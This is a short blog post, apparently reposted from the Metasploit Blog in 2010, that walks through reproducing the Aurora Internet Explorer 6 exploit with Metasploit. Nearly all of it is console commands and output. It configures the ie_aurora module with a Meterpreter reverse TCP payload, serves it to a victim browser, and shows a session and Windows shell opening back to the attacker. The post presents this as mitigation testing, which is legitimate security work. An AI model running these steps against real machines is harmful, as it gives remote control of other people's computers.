Reproducing the Aurora IE Exploit

gmoskov — Sat, 16 Jan 2010 02:45:06 +0000

Yesterday, a copy of the unpatched Internet Explorer exploit used in the Aurora attacks was uploaded to Wepawet. Since the code is now public, the guys from Metasploit have ported it to a module in order to provide a safe way to test your workarounds and mitigation efforts. Note that this only works for IE6, just like the original exploit code.

To get started, grab the latest copy of the Metasploit Framework and use the online update feature to sync latest exploits from the development tree. Start the Metasploit Console (msfconsole) and enter the commands in bold:

msf > use exploit/windows/browser/ie_aurora
msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ie_aurora) > set LHOST (your IP)
msf exploit(ie_aurora) > set URIPATH /
msf exploit(ie_aurora) > exploit

[*] Exploit running as background job.
[*] Started reverse handler on port 4444
[*] Local IP: http://192.168.0.131:8080/
[*] Server started.

msf exploit(ie_aurora) >

Open Internet Explorer on a vulnerable machine (we tested Windows XP SP3 with IE 6) and enter the Local IP URL into the browser. If the exploit succeeds, you should see a new session in the Metasploit Console:

[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.131:4444 -> 192.168.0.126:1514)

msf exploit(ie_aurora) > sessions -i 1
[*] Starting interaction with 1…

meterpreter > getuid
Server username: WINXPDeveloper

meterpreter > use espia
Loading extension espia…success.

meterpreter > shell
Process 892 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:Documents and SettingsDeveloperDesktop>

Source: Metasploit Blog

Think Security » exploit

Reproducing the Aurora IE Exploit